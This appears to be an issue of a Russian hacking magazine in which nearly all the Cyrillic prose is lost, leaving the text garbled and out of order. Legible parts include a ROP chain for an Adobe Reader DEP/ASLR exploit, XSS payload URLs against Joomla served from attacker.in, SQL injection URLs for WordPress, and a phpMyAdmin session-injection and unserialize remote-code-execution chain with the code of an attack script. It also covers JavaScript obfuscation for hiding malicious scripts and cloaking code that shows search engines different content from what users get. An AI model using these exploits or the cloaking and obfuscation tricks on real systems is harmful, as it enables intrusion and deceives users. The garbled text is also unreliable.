39200b7a  call <jmp.&msvcr90.memcpy>       ; memcpy - overflow!
39200b7f  add esp,0c
39200b82  pop ebp
39200b83  retn 0c

ROP-, .
ROP-:
0x3F2CB9E0

POP ECX
RETN
# HeapCreate() IAT = 3F10115C

0x3F389CA5

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX == HeapCreate()

content << "}"


content << "}"
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)


ROP-

XSS
CSRF

0x3F39AFCF

CALL EAX
RETN
# HeapCreate()
# EAX
#

0x3F2CB9E0

POP ECX
RETN
# pop 0x00008000 ECX

# ECX
#
0x3F39795E

0x3F39CB46

ADD EAX,ECX
POP ESI
RETN
# ECX EAX ,
# HeapAlloc, EAX RWX-

0x3F2CB9E0

POP ECX
RETN
# pop 0x3F3B3DC0 ECX,
# -

MOV DWORD PTR DS:[ECX],EAX


RETN
# RWX-
# 0x3F3B3DC0 (ECX)

POP EDX
RETN
# pop 0x00000024 EDX

0x3F39CB44

ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# 0x24 ECX ( )

0x3F398267

MOV EAX,ECX
RETN

0x3F2233CC

POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
pop 0x3F3B3DC4 EAX,
0 -
, 0
ESP, ESP ,
( )

0x3F2D59DF

#
#
#
#
#

0x3F3A16DE

MOV DWORD PTR DS:[ECX],EAX


XOR EAX,EAX
POP ESI
RETN
# EAX (Stack Address+24 =
# ESP )
# ESI. ESI
# ,

0x3F398267

MOV EAX,ECX
RETN

0x3F2CB9E0
0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) EAX

POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX

0x3F389CA5
0x3F2B745E


MOV ECX,DWORD PTR DS:[EAX]


RETN

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX RWX-

PMA_createTargetTables
: Snake
CVE: CVE-2011-0611
, DEP/ASLR CVE-2011-0611, 4
2011 .

memcpy,
0x3F2B0A7C

XCHG EAX,EDI
RETN 4
# EDI = RWX-

0x3F2CB9E0

POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX

EXPLOIT
DEP/ASLR Tatsumaki.
Adobe-X ( sandbox).
, cryptocme2.dll.
cryptocme2.dll:
<</Type/Catalog/Pages 3 0 R/OpenAction 5 0 R/AcroForm 7 0 R >>
And then

0x3F389CA5

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX RWX-

8 0 obj
<</Length 372>>

0x3F38BEFB

ADD AL,58
RETN
# - :)

0x3F2CB9E0

POP ECX
RETN
# pop 0x00000080 ECX
# (0x80 * 4 = 0x200 = )

0x3F3441B4

REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]


POP EDI
POP ESI
RETN
# RWX-

CALL EAX
RETN
#

stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfatemplate/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
endstream
endobj

0x3F39AFCF

xref

TARGETS
Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010,
Office 2004 2008 Mac, Office Mac 2011 Open XML File Format
Converter Mac.
SOLUTION
.

02

Adobe Reader X Atom Type Confusion


Vulnerability Exploit

CVSS V2 BASE SCORE:

9.3 (HIGH)

,
ASLR,
:).
TARGETS
Adobe Flash Player 10.2.154.27 Windows, Mac OS X, Linux,
Solaris, 10.2.156.12 Android;
Adobe AIR 2.6.19140;
Authplay.dll ( AuthPlayLib.bundle) Adobe Reader 9.x
9.4.4 10.x 10.0.1 Windows;
Adobe Reader 9.x 9.4.4 10.x 10.0.3 Mac OS X;
Adobe Acrobat 9.x 9.4.4 10.x 10.0.3 Windows Mac OS X

( )
Flash-.

(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
: 3 2011

SOLUTION
Adobe Flash Player.


SOLUTION
3.1.4 3.2-RC3.
, -
Author.

04

XSS- Joomla! 1.6.3

CVSSV2

(AV:N/AC:M/Au:N/C:P/I:P/A:P)
BRIEF
YGN
Joomla, : com_contact, com_content, com_newsfeeds
com_search. ,
, URL.

RTF-,

03

SQL- WordPress 3.1.3

CVSSV2

6.0

(AV:N/AC:M/Au:S/C:P/I:P/A:P)
BRIEF
WordPress , ,
. , ,
, .
: SQL, Editor, !
,
WordPress, , ,
.
EXPLOIT
- ,
, .
get_terms(), wp-includes/taxonomy.php, , ,
Editor SQL- orderby order. URL
SQL- (
[]):
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[]&order=[]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[]&order=[]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[]&order=[]

get_bookmarks(),
wp-includes/bookmark.php, URL
: http://localhost/wp-admin/link-manager.php?orderby=[]&order=[].
, ,
, , . ,
sqlmap, BackTrack.
TARGETS
WordPress 3.1.3/3.2-RC1 , , .


6.8

EXPLOIT
Joomla!
,
QueryString, option searchword. PoC com_contact
QueryString :
http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=1";><script>alert(/XSS/)</script>

:
http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=";><script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering
http://attacker.in/joomla163_noseo/index.php?option=";><script>alert(/XSS/)</script>&task=reset.request

com_search searchword POST-


(Live HTTP Headers, Tamper Data, etc).
:
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125

option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search

TARGETS
Joomla! 1.6.3 .

? $c $_SESSION,
, , .
, config/config.inc.php
PHP-, !
.
server_synchronize.php:

SOLUTION
Joomla! 1.6.4 .

05


phpMyAdmin 3.x

CVSSV2

7.5

(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Mango phpMyAdmin -,
MySQL.
SQL- XSS ,
-. .
EXPLOIT
libraries/auth/swekey/swekey.auth.lib.php
266-276 :
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)
{
    parse_str($_SERVER['QUERY_STRING']);
    session_write_close();
    session_id($session_to_unset);
    session_start();
    $_SESSION = array();
    session_write_close();
    session_destroy();
    exit;
}

, parse_str
, , $_SESSION. SQL XSS, ,
.
, , 42,
.
, $cf->getServerName($id) , , . $id,
$c[Servers], . , */,
PHP-. $c
$cf->getConfig() 26. , ,
:
public function getConfig()
{
    $c = $_SESSION[$this->id];
    foreach ($this->cfgUpdateReadMapping as $map_to => $map_from)
    {
        PMA_array_write($map_to, $c, PMA_array_read($map_from, $c));
        PMA_array_remove($map_from, $c);
    }
    return $c;
}


466: $trg_db = $_SESSION['trg_db'];


477: $uncommon_tables = $_SESSION['uncommon_tables'];
674: PMA_createTargetTables($src_db, $trg_db, $src_link,
$trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);

PMA_createTargetTables . , $uncommon_tables[$table_index] $trg_db
$_SESSION. , ,

preg_replace, 627-631.
, e
, ,
PHP-.
. :
Suhosin, ... : , ,
- .
, , .
libraries/display_tbl.lib.php, 1291-1299:
if ($GLOBALS['cfgRelation']['mimework'] && $GLOBALS['cfg']['BrowseMIME'])
{
    if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) &&
        isset($GLOBALS['mime_map'][$meta->name]['transformation']) &&
        !empty($GLOBALS['mime_map'][$meta->name]['transformation']))
    {
        $include_file = $GLOBALS['mime_map'][$meta->name]['transformation'];
        if (file_exists('./libraries/transformations/' . $include_file))
        {
            $transformfunction_name = str_replace('.inc.php', '',
                $GLOBALS['mime_map'][$meta->name]['transformation']);
            require_once './libraries/transformations/' . $include_file;

require_once $include_file,
$GLOBALS, . ,
$GLOBALS['mime_map'][$meta->name]['transformation'] ../../../../../../etc/passwd, /etc/passwd. , .
exploit-db.com , 17510
17514, !
TARGETS
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
SOLUTION
phpMyAdmin . z



|qbz| (lopuxin.iv@yandex.ru, essenzo.net)

JAVASCRIPT:

,
-

,
, ,
.
JavaScript
-, (iframe), SEO.
JS-,
, , .

-, :
1. ?
web-,
,
.
:
HTML- ;
JavaScript-/JS- ;
CSS-/CSS- ;
( , data).
2. ?
:
( iframe
);
(,
JavaScript , - ).
3.
?


.
? , , . ,
/
, , . ,
.
.
4. / ?
: /
. PHP-, .
JavaScript:
, , .

HTML/CSS

, HTML- CSS-?
: JavaScript,
HTML-.


(script.js). index.html
:
<script type="text/javascript"
src="./script.js"></script>

text, (script.js) javascript


. :
<script src="text/javascript"
type="./script.js"></script>

. , :

JJEncode
( //):
<html>
<script>
var html = '<center><h3> -</h3></center>'; // page markup kept in the "html" variable
document.getElementsByTagName('html')[0].innerHTML = html; // written into <html> </html>
</script>
</html>

CSS-:
<html>
<script>
var css = 'body{margin:0px;}.subcl{padding:5px;}'; // style rules kept in the "css" variable
document.getElementsByTagName('html')[0].innerHTML = '<style>'+css+'</style>'; // written into <html> </html>
</script>
</html>

HTML CSS
,
JavaScript.
, - , .
.


<script>

,
,
.
.
(index.html) JavaScript-,
<script src="text/javascript" type="http://host.com/////////script.js"></script>

: !
,
JavaScript.
:).

JavaScript-


JS-,
. ,
onLoad, onClick ..
:

HTTP://WWW
links
javascriptobfuscator.com
.
utf-8.jp/public/jjencode.html
.
dean.edwards.name/packer
javascript.
jsbeautifier.org
.

<body onLoad="alert(1);"></body>
<textarea onClick="alert(1);"></textarea>

, body frameset
onLoad,
/.
, .

Cookie, Referrer

JavaScript , cookie (document.cookie),


(document.referrer) (location.href).
,
eval(),

JavaScript-.
,
:

DVD
dvd



JavaScript ,

.

cookievalue=||alert(1);||

:
<script>eval(unescape(document.cookie).split("||")[1]);</script>

cookie-
, ||.
([1]) eval().
, ,
, , ,
! :
<?php
// JavaScript- + ( 123)
setcookie('cook', '||alert(1);document.cookie="cook=123";||');
?>
<script>
//
eval(unescape(document.cookie).split('||')[1]);
</script>

, JavaScript, , location.href document.referrer.

Ajax

,

eval().
,
:
1. , ( l):
alert(1);

2. :
<script>
function x(){
try{return new XMLHttpRequest();}
catch(e){try{return new ActiveXObject('Msxml2.XMLHTTP');}
catch(e){try{return new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){return null;}}}
};
function y(){var z=x();if(z){z.open('get','./l');z.onreadystatechange=function(){if(z.readyState==4){eval(z.responseText);}};z.send(null);}};
y();
</script>

(
l). , , .

, , ,
Opera. ,

( nullbyte ASCII 0). ?
, Opera - . :
<html> - </html>
<?php echo(chr(0)); ?>



<script>alert(1); /* */</script>

,
. PHP , .

HTML-

HTML, . , :
<body><img src="./pict.jpg" a="al" b="er" c="t(1);"></body>
<script>a = document.body.innerHTML; eval(a.split('a="')
[1].split('"')[0]+a.split('b="')[1].split('"')[0]+a.
split(' c="')[1].split('"')[0]);</script>

img,
, .
HTML/JavaScript :
HTML:
<!-- alert(1); -->
JavaScript:
// alert(1);
/* alert(1); */

,
, jQuery, mooTools
. , (
).
, , , , ,
, , .
JS-.


/ JavaScript

,
JavaScript :
:
<script>document.getElementsByTagName("html")[0].innerHTML
= document.getElementsByTagName("body")[0].innerHTML.length;
</script>
:
<script>a=document;c='getElementsByTagName';a[c]("html")[0].
innerHTML = a[c]("body")[0].innerHTML.length;</script>

document
a, getElementsByTagName c.


, (, , ,
.length .getElementsByTagName)
(
). document,
getElementsByTagName, ,
:
1) document.getElementsByTagName
2) document['getElementsByTagName']

,
(getElementsByTagName), ,
,
.

//.
, .

,
, -,
. , :
:
<script>/* pOIEPGpmkG13Pg */ a /* PGpmkG13Pggweg */ = /*
mkG13Pg */ 'hahaha' /* pOIE13Pg */ ; /* wegEGoh */ alert /*
oiwboierhper */ ( /* igwepreorh */ a /* wbnponrhR */ ) /*
inboierh */ ; /* roinero */</script>
:
<script> weoibog = 'gwrobgoerh'; a = 'hahaha'; bfionb =
'wgeogioweg'; alert(a);</script>

,
: a = hahaha; alert(a);.
.
PHP-
JavaScript. - ,
,
.
, :
/*/ alert(1); /*/ alert(2); /*/ alert(3); /*/

? :)

- , ,


, -
:
<script> alert(document["\x63\x6F\x6F\x6B\x69\x65"]);
</script>

-,
cookie document, .
-, .
cookie ,
document.cookie, ,
( ), document.
cookie .
PHP- :
<?php
function cescape($s)
{
    $c = array();
    foreach (str_split($s, 1) as $sym)
    {
        // two-digit hex code of each character
        $d = dechex(ord($sym));
        $c[] = (strlen($d) == 1) ? '0' . $d : $d;
    }
    return '\\x' . implode('\\x', $c);
}
?>

, JavaScript
, : document.
getElementById document[getElementById]. ,
.
-
. , getElementById.
:
<script> a = b(c(d())); </script>

, b, c d
. ,
, try{}catch(){}:
<script> try{a = b(c(d()))}catch(e){alert(e);} </script>

, , ,
,
.
,
getElementById?
:
<script>try{(getE(leme(ntB(yId()))))}catch(e){x = (e+'').
split('(').slice(1,5).join('');}</script>


getElementById, x.
? , ,
.
, JavaScript.

~ () : alert(~13);. -14.
-(+1).
, a , : a = ~[];
a -1. ?

0, , ~0
-(0+1), -1.
:
a = ~[]; // -1
a = -~[]; // 1
a = []^[]; // 0
a = ~~[]; // 0
a = ~true; // -2
a = ~false; // -1
a = -~[]*(""+-~[]+-~-~-~-~-~[]+-~-~true); // 153

/ -


.
JavaScript.
, ,
.
, , code.
, charCodeAt(),
fromCharCode() .
:
a = (alert+'').split("ive ")[1].substr(0,4);

a
code. .
: alert(alert+);. - function alert()
{ [native code] }. , -
alert(),
.
, . ,
, JavaScript
. ,
,
, , (+).

/ JavaScript
. :
escape(); // URL
unescape(); // URL-
encodeURI(); // URI
decodeURI(); // URI-

String, ASCII- :
a = String.fromCharCode(97);
b = "b".charCodeAt();

, .match .replace.
, , .


(, ).
, ,
. []. , document.
this. JavaScript, this
, ,
. getElementById : this[document]
[getElementById].

,
.
, JavaScript- ,
,
.
:
, ,
/.

+ ,
:
// location.href.split('/')[2];
( #?) //
location.href.split('#')[1] location.href.split('?').
slice(1);
// a = new Date();
JavaScript // <script id="jscode">a =
document.getElementById('jscode').innerHTML;</script>;
// a = document.
getElementsByTagName('html')[0].innerHTML;
// a = navigator.userAgent;
- // document.cookie;
, .

eval(),
document.write() .
alert() ,
,
, , . , eval()?
, this. eval() :
a = this["\x65\x76\x61\x6C"];.


a() eval().

:
1) "o", "O", "0"
2) "i", "I", "l", "1"
3) "_" ( "__", "___" ...)
4) "$" ( "$$", "$$$" ...)


, , .

, -
/ . : eval()
+ _() + _.
.
, alert(1);. ,
(ASCII ),
( ) . , ,
,
2-2,5 , ,
- (
). %,
URL-.
PHP-:
<?php
$a = "alert(1);";
$a = str_split($a, 2);

$e = '';
foreach ($a as $v)
{
$e .= '%' . $v[0] . (ord($v[0])+ord($v[1]));
}
echo($e);
?>

: %a205%e215%t156%190%;59.
JavaScript:
function d(s)
{
    s = s.split('%').slice(1);
    var c = '';
    for (var i = 0; i < s.length; i++)
    {
        // each chunk is: first character + (code of first + code of second)
        c += s[i][0] + String.fromCharCode(
            s[i].substr(1) - s[i][0].charCodeAt());
    }
    return c;
}

: eval(d('%a205%e215%t156%190%;59'));.
.
,
:
z = '73706C697421736C696365216C656E6774682166726F6D43686172436F6465217375627374722163686172436F64654174';
_='';
for(__=0;__<z.length/2;__++){_+=unescape('%'+z[__*2]+z[__*2+1]);}
_=_[_[0]+_[1]+_[2]+_[3]+_[4]]('!');
function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I='';for (_l=0;_l<__[_[2]];_l++){_I+=__[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;}
this['\x65\x76\x61\x6C'](___('%a205%e215%t156%190%;59'));


:
1. z = '....'

,
split!slice!length!fromCharCode!substr!charCodeAt (\x73\x70\x6C\x69\x74...) \;
2. _='';for(...}

split!slice!length!fromCharCode!substr!charCodeAt _;
3. _=_...('!');

, !;
4. function ___(__){...}

d() ;
5. this['\x65\x76\x61\x6C'](....);

, .
100% ,

. ,
,
,
. , . z



RushteR (rushter.com)


GOOGLE

, .

.

SEO. ,

,
.

SEO-, ,

.
, ?
.
,
().
. , , .
,
, ,
. : (),
,
.
,


,
,
. ,
, .

, ,
- (
Google).
:
1. ( ).
2.
.
,
, .
.

HTTP://WWW
links
jscompress.com

JavaScript .
jquery.com Jquery.
addons.mozilla.org/en-US/firefox/addon/modify-headers
modify headers
FireFox.


Modify Headers

, Google
, User-Agent
.
, google PHP:

HTTP referrer;
User-Agent;
IP-;
JavaScript.

HTTP .
, ,
.
.

HTTP referrer


HTTP referrer.

:
1. .
2. .
:
<?php
if (strstr($_SERVER['HTTP_REFERER'],
    "http://google."))
    echo ' ';
else
    echo ' ';
?>

,
- , . HTTP
referrer .

User-Agent

HTTP-
User-Agent .
.

.
, Google , , User-Agent.
:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Googlebot/2.1 (+http://www.google.com/bot.html)

<?php
if (stristr($_SERVER["HTTP_USER_AGENT"], "google"))
    echo ' ';
?>

IP-

IP-
. ,
, , .
, ,
.
IP- hostname
google:
<?php
$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+",
"70\.91\.180\.25",
"81\.159\.49\.212");
foreach ( $stop_ips_masks as $v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']))
{
echo ' ';
break;
}
}
if (strpos(gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
echo ' ';
?>


,
, .

IP-

IP-,

.
, IP- :
<div style="display:none"><a href='target.php'>click</a></div>


HTTP-
IP- :
<?php
$f = fopen('base.txt','a+');
fwrite($f,str_replace('.', '\.', "'".
$_SERVER['REMOTE_ADDR']."',\n"));
fclose($f);
?>

IP-, .

.

JS-

, ,
. JavaScript Google , ,
. , JS-

.
JQuery,
.
, , JavaScript-, , ,
. , .


? , - ,
: , , ,
..
, ,
.
,
JQuery:
$(document).ready(function () {
$(window).bind(
'click mousemove scroll resize keydown',function(event) {
alert(' : '+event.type);
});
});

,
, . image.png
:
<?php
if (stristr($_SERVER["HTTP_USER_AGENT"], "google"))
{
    header('Content-Type: image/png');
    readfile('image2.png');
}
else
{
    header('HTTP/1.1 404 Not Found');
    die();
}
?>

png,
.htaccess :
AddType application/x-httpd-php .png

JavaScript ,
:
document.write('<img src="image.png"/>');
$(document).ready(function () {
$('img[src*="png"]').error(function () {
alert(' ');
})
});

? image.
png ,
404.
JavaScript- , (
, ).
, JavaScript- Google ,
. ,
, ,
, , .

,
. ,
, ,
, ,
.
:
document.write('<div id="dialog" class="window"> <img src="promo.jpg" style="cursor: pointer;"> </div> <div id="mask"></div>');
$(document).ready(function () {
    $("#dialog").css('position', 'absolute');
    $("#dialog").css('display', 'none');
    $("#dialog").css('z-index', '9999');
    $("#mask").css('position', 'absolute');
    $("#mask").css('left', '0');
    $("#mask").css('top', '0');
    $("#mask").css('z-index', '9000');
    $("#mask").css('background-color', '#000000');
    $("#mask").css('display', 'none');
    $(window).bind('mousemove scroll resize keydown',
    function (eve) {
        var maskHeight = $(document).height();
        var maskWidth = $(window).width();
        $('#mask').css({
            'width': maskWidth,
            'height': maskHeight
        });
        $('#mask').fadeIn(1000);
        $('#mask').fadeTo("slow", 0.90);
        $("#mask").css('background-color', '#000000');
        var winH = $(window).height();
        var winW = $(window).width();
        $("#dialog").css('top', winH / 2 - $("#dialog").height() / 2);
        $("#dialog").css('left', winW / 2 - $("#dialog").width() / 2);
        $("#dialog").fadeIn(2000);
        $(window).bind('click', function (event) {
            $(this).load('pl.txt', function (resp) {
                eval('window.location = "' + resp + '";');
                $(this).unbind(event);
            });
        });
    });
});

,
:
1. :
Action = Modify
Name = Referer
Value = http://google.com

2. Options Always on.

3.
.

.
:

JQuery

- ,
,
,
pl.txt. ,
,
. - , ,

.
, , ,
. - :

.

,
, :). , ,
,
FireFox Modify Headers.
Modify Headers

User Agent;
Referrer;
IP;
;
;
;
,
.

IP-
.
.htaccess, ,
.

Google Toolbar

, Google ,
,
Google Toolbar. ,
.
Google toolbar javascript,
. , . , ,
, .
Google, , ,
. ,
.
, , .
,
.

,
. ,
.
, IP-
. (javascript, ),

. ,
. z



oxdef (oxdef.info)

OWASP APPSEC EUROPE 2011:


?


-
Twitter,
IBM,
, ?
, , -
. , .
Intro

XSS, CSRF, SQLi, Click-Jacking - ,


, OWASP
WASC. The Open Web Application Security Project (OWASP)
, , .
, ,
-.
10
- OWASP Top10 (
,

. .).
, HTTP WebScarab Zed Attack Proxy,
WAF ModSecurity, - WebGoat .
, . AppSec Europe 2011 OWASP , ,
- .

OWASP AppSec

OWASP AppSec 2004 2005



, ,
, , .

,
-
( ).
( 7 11 ), ,
.
, .


(, , ),

- ( ). , . : Fortify/HP, Adobe,
IBM, Verizon, Microsoft, . ,
, :).

,
7 Elements Ltd
APT :). APT , Debian GNU/
Linux. APT Advanced Persistent Threat (
). ,
,
, ,
. ,
, -
, - .
( APT!)
( )
APT ! :) ,
APT, ,
.
:
-
. ,
,
. , , , ,

- ( ), SOAP-.

, :)
XML Signature
XML-, id , . ,
,
, !

.
,
-
IBM
. ,
- ? ?
,
? , IBM


:). SDLC ,

.

Python
- InGuardians
Inc. ?, . ,
Python, , ,
Perl.
- , urllib/httplib
!
.
,

pycit,

-.
, ,
- .
, , SVN, .

-
CTF, .
HackQuest , CTF .
,

HTTP- .
, , , . (-,
:),
:

(, ,
).
,
.
, , SDL ?
, SDL
.

Nokia Microsoft.
, ,
. ,
. Microsoft
,
, . -

HTTP://WWW
links



:
owasp.org/index.php/AppSecEU2011

WASC:
www.webappsec.org
Top10
OWASP:
owasp.org/index.php/Category:OWASP_Top_Ten_Project

-
OWASP:
owasp.org/index.php/Category:OWASP_Testing_Project


-. , ...
,
.

-
(IETF). ,
-:
Mime-Sniffing;
Same-Origin Policy;
Secure Channel: * HSTS Strict Transport Security * TLS in
DNSSEC;
Frame-Options;
Content Security Policy;
Do-Not-Track.
, HSTS. SSL-stripping
. , , ,
- ,
HTTPS, , (,
ARP-spoofing), https-
http. , ,

SSL-. HTTP Strict Transport Security (HSTS)
- -,
HTTPS.
HTTPS- : Strict-Transport-Security: max-age=15768000; includeSubDomains.
- -
15768000 HTTPS,
.

Denim Group.
iOS Android-
.
,
,
SQL- , , .



-: <iframe
src=the_scheme://stuff?param=PAYLOAD />. . , , , ,
,
.

Gotham Digital Science
-.
.
,
.
. , , ,
padding-
, :).
,
(
www.xakep.ru/magazine/xa/119/058/1.asp).
.
.

Outro

. -
. ,
, ,
. ,
1592 I! ,
-
. OWASP AppSec
Europe .
.
:). ,
-
. z

#HACKER TWEETS


. .
. ,
.
twitter.com/asintsov .
@cesarcer:
:
,
:
,
.

@PiotrBania:


( : t.co/UexpfJP),
pwnie
awards (t.co/F6biKi6).
:
,

.

,

( , ,
)
, Blackhat 2011 -.

@LulzSec:
,
! ,

.
!

@shaver:
** : Sony Electronics

C. .

@evdokimovds:
IDA v6.1 HexRays v1.5 .
http://t.co/Q4O0B5Q


@0xcharlie:
!= -.

@j00ru:

MS11-056: CVE-2011-1282:
User-Mode & .
: http://t.co/fEn.
:

CSRSS CVE-2011-1282.

@aaronportnoy:
,
,
cmp reg8,
0x3E. , ,

XML-?
:
XML- cmp reg8,
0x3E (0x3E :
'>'. cmp ).
,
, , ,
XML-... )

@0xcharlie:
MS:
Windows 7 0 .
,
250 000 .
, !
: Microsoft
... ...

@kingcope:
:
root- OpenSSH
3.5p1 FreeBSD.
http://t.co/DYHct9W

@crypt0ad:
, , ,
,
... #JOP.
: JOP Jump Oriented
Programming, ROP,

(JMP reg),
RETN.

@jeremiahg:

RSA
=
-.

@Ariel_Coronel:

+. ... ,
, ,
..

@dakami:
, 88-
,
iPad. .

@attackresearch:
,
, - .



M4g (icq 884888, http://snipper.ru)

PHPMYADMIN


IT-
,
MySQL- phpMyAdmin
,
.
.

, , phpMyAdmin
, :).
Mango
:
./libraries/auth/swekey/swekey.auth.lib.php
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset')
!= false)
{
parse_str($_SERVER['QUERY_STRING']);
session_write_close();
session_id($session_to_unset);
session_start();
$_SESSION = array();
session_write_close();
session_destroy();
exit;
}


, ? parse_str().
,
- .
:
1. parse_str();
2. ;
$_SERVER[QUERY_STRING] ( ,
?).

( ).
, :
$_SESSION, .
Mango ,
, .
. session_write_close()

RFI
, session_id()
,
. -
, session_start()
.

:
http://pma/?session_to_unset=123&token=
[]&_SESSION[foo]=bar

,
XSS SQL-.
.


.
./setup/lib/ConfigGenerator.class.php:
public static function getConfigFile()
{
...
$c = $cf->getConfig();
...
$ret = '<?php ' . $crlf
...
if ($cf->getServerCount() > 0) {
...
foreach ($c['Servers'] as $id => $server) {
$ret .= '/* Server: ' .
strtr($cf->getServerName($id), '*/', '-')
. " [$id] */" . $crlf . '$i++;' . $crlf;
...

.
,
PHP- phpMyAdmin.
, $c[Servers] (
$id) . ,
,
.
getConfig(),
$c:
./libraries/config/ConfigFile.class.php
public function getConfig()
{
    $c = $_SESSION[$this->id];
    ...
    return $c;
}

Mango

! $c
$_SESSION, , ,
!
PHP-,
./config/config.inc.php.
(
magic_quotes_gpc).
./config ,
.

WARNING
warning
,



,

.

./config
. :
magic_quotes_gpc = On
mysql-.
:
./server_synchronize.php
...
$trg_db = $_SESSION['trg_db'];
...
$uncommon_tables = $_SESSION['uncommon_tables'];
...
PMA_createTargetTables($src_db, $trg_db,
$src_link, $trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);

PMA_createTargetTables:
./libraries/server_synchronize.lib.php
function PMA_createTargetTables($src_db,
$trg_db, $src_link, $trg_link,
&$uncommon_tables, $table_index,
&$uncommon_tables_fields, $display)
{
...
    $Create_Table_Query = preg_replace('/'
        .PMA_backquote($uncommon_tables[$table_index])
        .'/', PMA_backquote($trg_db) . '.'
        .PMA_backquote(
            $uncommon_tables[$table_index]),
        $Create_Query, $limit = 1);
    ...

DVD
dvd

.

HTTP://WWW
links
Unserialize-
:
bit.ly/onZhAu.
PHP
: PHP-
bit.ly/n0cowc.

Mango

, , $uncommon_tables[$table_index]
$trg_db preg_replace() $_SESSION. ,
PHP-
preg_replace() e (eval), .
e

: (.+)/e%00. , , ,

:).
, ,
,
.
, Suhosin patch
e,
.

. -
. -
.
. Mango , ,


.
, ,
PoC .
PHP Session Serializer Session Data Injection Vulnerability, unserialize()
PHP (
).

, . PHP- : PS_DELIMITER PS_UNDEF_MARKER.


,
. PHP:
while (p < endptr) {
    zval **tmp;
    q = p;
    while (*q != PS_DELIMITER) {
        if (++q >= endptr) goto break_outer_loop;
    }
    if (p[0] == PS_UNDEF_MARKER) {
        p++;
        has_value = 0;
    } else {
        has_value = 1;
    }

,
PS_DELIMITER
PS_UNDEF_MARKER.
( : ,
, ) $_SESSION, PS_UNDEF_MARKER.
:
<?php
session_start();
$_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data'];
?>

<?php
session_start();
$_SESSION = array_merge($_SESSION, $_POST);
?>

: POST prefix=! data=|xxx|O:10:"evilObject":0:{}.


. , unserialize().

,
,

phpMyAdmin.
. unserialize(), , ,
__wakeup() .

,
. ,
:
http://site.com/phpMyAdmin/scripts/setup.php?
action=lay_navigation&eoltype=unix&token=[]&
configuration=a:1:{i:0;O:10:"PMA_Config":1:
{s:6:"source";s:[_]:"[__FTP__]";}}

RFI-,

file_exists(), , , FTP-.
(
),
, rdot.org
FTP .
, unserialize()- phpMyAdmin < 3.

, , ,
, phpMyAdmin :).
,
( ).
:
1. phpMyadmin;
2. HTML- , , :
preg_match(
'@name="token" value="([a-f0-9]{32})"@is',$page,$to);
$token = $to[1];

3.
:
preg_match(
'@phpMyAdmin=([a-z0-9]{32,40});?@is',$page,$se);
$session = $se[1];

4.
.
while :
$sess_path = array(
'/tmp/',
'/var/tmp/',
'/var/lib/php/',
'/var/lib/php4/',
'/var/lib/php5/',
'/var/lib/php/session/',
'/var/lib/php4/session/',
'/var/lib/php5/session/',
...


:

$inj = $sess_path[$o].'sess_'.$session;
$query = $pma.'?session_to_unset=123&token='.
$token.'&_SESSION[!bla]='.urlencode(
'|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.
strlen($inj).':"'.$inj.'";}}');

: $sess_path[$o] $sess_path
, $session ,
$pma , $token .
$query : ,
. , ,
.
PMA_Config.

PHP-.
:
&_SESSION[payload]=<?php phpinfo(); ?>

payload ,
RFI.

. , ,
, Mango,
: magic_quotes_gpc = off PHP <= 5.2.13 & PHP <=
5.3.2.
.

, -

. ,
-
(
PoC ).
,
:). z



(icq 884888, snipper.ru)


blackhat

X-TOOLS
: Decodeby.US
deZender Public
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Ps2Gamer & Cyko

: -
: *nix/win
: & Slyer

PHP
-
Zend,
ionCube. , !
Decodeby.US deZender Public PHP-,

decodeby.us.
, :
1. .
2.
01_Decode.
